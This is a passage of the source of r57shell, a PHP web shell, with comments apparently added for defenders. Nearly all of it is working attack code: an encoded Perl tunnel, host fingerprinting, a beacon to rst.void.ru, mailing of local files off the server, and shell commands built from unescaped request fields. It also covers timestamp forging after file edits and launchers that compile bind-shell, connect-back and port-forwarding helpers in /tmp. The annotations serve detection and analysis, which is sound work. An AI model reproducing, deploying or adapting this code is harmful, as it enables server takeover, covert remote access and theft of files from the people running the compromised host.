1446 CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1447 bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1448 gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1449 NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1450 iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1451 aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1452 SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1453 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1454 WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1455 CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1456 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1457 I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1458 m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1459 IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1460 lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1461 QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1462 CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1463 c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1464 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1465 UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1466 DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1467 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1468 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1469 $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1470 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1471 lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1472 FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
1473 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1474 J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1475 oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1476 xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1477 i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1478 dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1479 ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1480 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1481 $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1482 IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1483 hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1484 tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1485 XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
1486 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1487 ybmV0LS0+";
// Host fingerprint on Unix: `uname -a`, `id` and the sysctl OS type/release are run
// once through ex() and then cached in cookies named uname, id and sysctl. Later
// requests take the cookie value without re-running the command.
// Detection: a response that sets cookies named `uname`, `id` or `sysctl` whose values
// are command output, and requests replaying them, are usable HTTP-level signatures.
// On the host, the first request spawns `uname -a` and `id` from the web-server worker.
if($unix)
{
    if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
    if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
    // With command execution unavailable ($safe_mode set) sysctl is shown as '-'.
    if($safe_mode) { $sysctl = '-'; }
    else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
    else
    {
        // BSD-style keys first (kern.*), then Linux-style (kernel.*).
        $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
        if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
        if(empty($sysctl)) { $sysctl = '-'; }
        setcookie('sysctl',$sysctl);
    }
}
echo $head;
echo '</head>';
// Version check that doubles as a beacon; runs only on the landing view (no 'cmd'
// POSTed). It is skipped when the first octet of SERVER_ADDR is 127, 192, 172 or 10 -
// a coarse private-range test that also skips public addresses in 172.x and 192.x.
// Otherwise two requests go to rst.void.ru/r57shell_version/version.php:
//   1. a zero-size <img>, fetched by the visitor's browser (such a request would
//      normally carry a Referer pointing at this script's URL);
//   2. readfile(), fetched by the server itself (needs allow_url_fopen), with the
//      response body echoed into the page.
// Both are network indicators: outbound HTTP from a web server to this host/path, or
// the same URL in proxy logs, points at a planted copy of the script.
if(empty($_POST['cmd'])) {
    $serv = array(127,192,172,10);
    $addr=@explode('.', $_SERVER['SERVER_ADDR']);
    // The version string with dots removed (e.g. "1.31" -> "131") is sent as a parameter.
    $current_version = str_replace('.','',$version);
    if (!in_array($addr[0], $serv)) {
        @print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
        @readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}
// Status banner: product name and version, server time, quick links, and a capability
// summary of the PHP runtime.
// The banner text ("r57shell " followed by the version) and the link set below are
// stable strings for content signatures and access-log matching.
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
// Quick links are bare query keys on the script itself: ?phpinfo, ?phpini, and on
// Unix ?cpu, ?mem, ?users, then ?tmp and ?delete.
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
if($unix)
{
    echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
    echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
    echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
}
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
// Here ON is drawn green and OFF red for safe_mode; for the extensions below green
// means the extension's connect function exists.
echo ws(2)."safe_mode: <b>";
echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
echo "</b>".ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
// Each extension is detected by probing for one of its functions.
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
echo "</b>".ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
    echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
echo "</b>".ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>".ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>".ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b><br>".ws(2);
// The disable_functions setting is shown verbatim; an empty value is shown as NONE.
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
// Disk usage for the working directory; diskfreespace() is an alias of disk_free_space().
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
1555 echo '</font></td></tr><table>
1556 <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1557 <tr><td align=right width=100>';
// System information panel: OS identification, server software, effective user and the working directory.
// Defender notes: $uname, $sysctl and $id may have been taken from request cookies earlier in the file
// and are echoed here without HTML escaping.
1558 echo $font;
1559 if($unix){
1560 echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1561 echo "</td><td>";
1562 echo "<font face=Verdana size=-2 color=red><b>";
// Falls back to php_uname() when no `uname -a` output is available; both are cut to 120 characters.
1563 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1564 echo ws(3).$sysctl."<br>";
1565 echo ws(3).ex('echo $OSTYPE')."<br>";
1566 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
// Identity of the PHP process: the `id` output if present, else the POSIX extension, else PHP's
// get_current_user()/getmyuid()/getmygid().
1567 if(!empty($id)) { echo ws(3).$id."<br>"; }
1568 else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
1569 {
1570 $euserinfo = @posix_getpwuid(@posix_geteuid());
1571 $egroupinfo = @posix_getgrgid(@posix_getegid());
1572 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
1573 }
1574 else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
1575 echo ws(3).$dir;
1576 echo ws(3).'( '.perms(@fileperms($dir)).' )';
1577 echo "</b></font>";
1578 }
1579 else
1580 {
// Non-Unix branch: php_uname(), server software, the USERNAME environment variable and $dir.
1581 echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1582 echo "</td><td>";
1583 echo "<font face=Verdana size=-2 color=red><b>";
1584 echo ws(3).@substr(@php_uname(),0,120)."<br>";
1585 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1586 echo ws(3).@getenv("USERNAME")."<br>";
1587 echo ws(3).$dir;
1588 echo "<br></font>";
1589 }
1590 echo "</font>";
1591 echo "</td></tr></table>";
// Stops the script when either embedded blob $c1 / $c2 is empty, then base64-decodes both into $f.
// $c1 and $c2 are assigned outside this part of the file and $f is not used within it.
// NOTE(review): the die() looks like a tamper check that disables the page if the blobs are stripped --
// confirm against the full file. An analyst should decode both blobs offline to see what they inject.
1592 if(empty($c1)||empty($c2)) { die(); }
1593 $f = '<br>';
1594 $f .= base64_decode($c1);
1595 $f .= base64_decode($c2);
// cmd=mail: sends a message with recipient, subject, body and From address all taken from the request.
// Defender notes: the From header is concatenated from $_POST['from'] with no CR/LF filtering, so
// additional headers can be injected; a compromised host can be used as a mail relay. err() is defined
// elsewhere; its argument is 6 plus the boolean result of mail().
1596 if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
1597 {
1598 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
1599 err(6+$res);
1600 $_POST['cmd']="";
1601 }
// cmd=mail_file: reads the local file named in $_POST['loc_file'] and mails it as an attachment to
// $_POST['to'] (file exfiltration over SMTP). compress() and mailattach() are defined elsewhere;
// presumably compress() updates $filename/$filedump and the $mime_type/$content_encoding variables
// initialised just before the call -- confirm.
// Defender notes: the default subject 'file from r57shell' and the default sender
// 'billy@microsoft.com' are searchable strings in MTA logs and mail queues.
1602 if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1603 {
1604 if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
1605 else
1606 {
1607 $filename = @basename($_POST['loc_file']);
1608 $filedump = @fread($file,@filesize($_POST['loc_file']));
1609 fclose($file);
1610 $content_encoding=$mime_type='';
1611 compress($filename,$filedump,$_POST['compress']);
1612 $attach = array(
1613 "name"=>$filename,
1614 "type"=>$mime_type,
1615 "content"=>$filedump
1616 );
1617 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
1618 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1619 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1620 err(6+$res);
1621 $_POST['cmd']="";
1622 }
1623 }
// cmd=find_text: rewrites $_POST['cmd'] into a `find ... | xargs grep -E ...` command line built by plain
// concatenation of the s_dir, s_mask and s_text request fields. The rewritten value is later passed to
// ex() by the generic branch further down, so the fields reach a shell unescaped.
1624 if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1625 {
1626 $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1627 }
// cmd=ch_: changes owner, group or mode of the path in param1 using PHP's own functions (no shell).
// For 'mod' the value in param2 is parsed as an octal number. Errors are suppressed with @.
// Defender notes: unexpected ownership or permission changes on web-writable files are worth
// correlating with POST requests to the same script.
1628 if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1629 {
1630 switch($_POST['what'])
1631 {
1632 case 'own':
1633 @chown($_POST['param1'],$_POST['param2']);
1634 break;
1635 case 'grp':
1636 @chgrp($_POST['param1'],$_POST['param2']);
1637 break;
1638 case 'mod':
1639 @chmod($_POST['param1'],intval($_POST['param2'], 8));
1640 break;
1641 }
1642 $_POST['cmd']="";
1643 }
// cmd=mk: creates or deletes a file or directory named by $_POST['mk_name'], selected by the
// 'what' (file|dir) and 'action' (create|delete) request fields. All paths come straight from the
// request; nothing restricts them to a base directory.
1644 if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1645 {
1646 switch($_POST['what'])
1647 {
1648 case 'file':
1649 if($_POST['action'] == "create")
1650 {
// Refuses to overwrite an existing file; on success the request is turned into an edit_file request
// for the new, empty file so the editor form is shown next.
1651 if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1652 else {
1653 fclose($file);
1654 $_POST['e_name'] = $_POST['mk_name'];
1655 $_POST['cmd']="edit_file";
1656 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1657 }
1658 }
1659 else if($_POST['action'] == "delete")
1660 {
// unlink() is not @-suppressed here, so a failure emits a PHP warning instead of a message from err().
1661 if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1662 $_POST['cmd']="";
1663 }
1664 break;
1665 case 'dir':
1666 if($_POST['action'] == "create"){
1667 if(mkdir($_POST['mk_name']))
1668 {
1669 $_POST['cmd']="";
1670 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1671 }
1672 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1673 }
1674 else if($_POST['action'] == "delete"){
1675 if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1676 $_POST['cmd']="";
1677 }
1678 break;
1679 }
1680 }
// cmd=edit_file: shows the file named in $_POST['e_name'] in a textarea and ends the request.
// The first fopen("r+") is only a writability probe: when it fails $only_read is set (and fclose() is
// then called on the failed handle). When it succeeds, that handle is overwritten by the second
// fopen() without being closed.
// Defender notes: file content is HTML-escaped, but e_name and $dir are written into the page and into
// unquoted hidden-input values without escaping.
1681 if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1682 {
1683 if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1684 if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
1685 else {
1686 echo $table_up3;
1687 echo $font;
1688 echo "<form name=save_file method=post>";
1689 echo ws(3)."<b>".$_POST['e_name']."</b>";
1690 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1691 echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1692 fclose($file);
1693 echo "</textarea>";
1694 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1695 echo "<input type=hidden name=dir value=".$dir.">";
1696 echo "<input type=hidden name=cmd value=save_file>";
// A read-only file gets a notice instead of the submit button.
1697 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1698 echo "</div>";
1699 echo "</font>";
1700 echo "</form>";
1701 echo "</td></tr></table>";
1702 exit();
1703 }
1704 }
// cmd=save_file: overwrites the file named in e_name with the posted text.
// Defender notes (anti-forensics): the modification time is read BEFORE the write and restored with
// touch() afterwards, for both mtime and atime. File mtime is therefore not a reliable sign of
// tampering on a host where this script ran; compare inode change time (ctime), content hashes or
// file-integrity-monitoring baselines instead. The handle opened here is never closed in this block.
1705 if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1706 {
1707 $mtime = @filemtime($_POST['e_name']);
1708 if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
1709 else {
// On Unix, CRLF line endings coming from the browser form are converted to LF before writing.
1710 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1711 @fwrite($file,$_POST['e_text']);
1712 @touch($_POST['e_name'],$mtime,$mtime);
1713 $_POST['cmd']="";
1714 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1715 }
1716 }
// Network helper launchers. Each branch writes a payload held in a variable defined outside this part
// of the file ($port_bind_bd_c, $port_bind_bd_pl, $back_connect, $back_connect_c, $datapipe_pl,
// $datapipe_c) to a fixed path under /tmp via cf() (defined elsewhere; presumably "create file"),
// optionally compiles it with gcc, and starts it in the background through ex(). Judging by the
// variable names these are a port-binding listener, a connect-back client and a port forwarder --
// confirm against the payload definitions.
// Defender notes / indicators visible in this block:
//   - files: /tmp/bd.c, /tmp/bd, /tmp/bdpl, /tmp/back, /tmp/back.c, /tmp/backc, /tmp/dp, /tmp/dpc.c, /tmp/dpc
//     (the .c sources are unlinked after compilation; the Perl scripts and binaries are left in place)
//   - the web-server account spawning gcc or perl, and long-lived children of the web server holding
//     listening sockets or outbound connections
//   - request fields are concatenated into the command lines without escaping
// Mitigations: mount /tmp noexec, keep compilers off production web hosts, restrict egress from the
// web tier, and disable PHP's process-execution functions where the application does not need them.
1717 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1718 {
1719 cf("/tmp/bd.c",$port_bind_bd_c);
1720 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1721 @unlink("/tmp/bd.c");
1722 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1723 $_POST['cmd']="ps -aux | grep bd";
1724 }
// Perl variant of the above; bind_pass must be present in the request but is not passed on the command line.
1725 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1726 {
1727 cf("/tmp/bdpl",$port_bind_bd_pl);
1728 $p2=which("perl");
1729 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1730 $_POST['cmd']="ps -aux | grep bdpl";
1731 }
// Connect-back helper, Perl variant: started with the request's ip and port as arguments.
1732 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1733 {
1734 cf("/tmp/back",$back_connect);
1735 $p2=which("perl");
1736 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1737 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1738 }
// Connect-back helper, C variant.
1739 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1740 {
1741 cf("/tmp/back.c",$back_connect_c);
1742 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1743 @unlink("/tmp/back.c");
1744 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1745 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1746 }
// Datapipe helper, Perl variant: arguments are local_port, remote_host, remote_port.
1747 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1748 {
1749 cf("/tmp/dp",$datapipe_pl);
1750 $p2=which("perl");
1751 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1752 $_POST['cmd']="ps -aux | grep dp";
1753 }
// Datapipe helper, C variant: note the different argument order (local_port, remote_port, remote_host).
1754 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1755 {
1756 cf("/tmp/dpc.c",$datapipe_c);
1757 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1758 @unlink("/tmp/dpc.c");
1759 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1760 $_POST['cmd']="ps -aux | grep dpc";
1761 }
// Alias lookup: replaces the command with a predefined entry from $aliases (defined elsewhere) when the
// posted alias name exists as a key.
1762 if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
// File upload. Uses the legacy $HTTP_POST_FILES array (old PHP versions only) and copy() rather than
// move_uploaded_file(). Destination directory and file name both come from the request, with no
// validation of either.
// Defender notes: new files appearing next to the script shortly after a multipart POST to it are a
// typical follow-on artefact; the uploaded name is also echoed unescaped in the error message.
1763 if (!empty($HTTP_POST_FILES['userfile']['name']))
1764 {
1765 if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1766 else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1767 @copy($HTTP_POST_FILES['userfile']['tmp_name'],
1768 $_POST['dir']."/".$nfn)
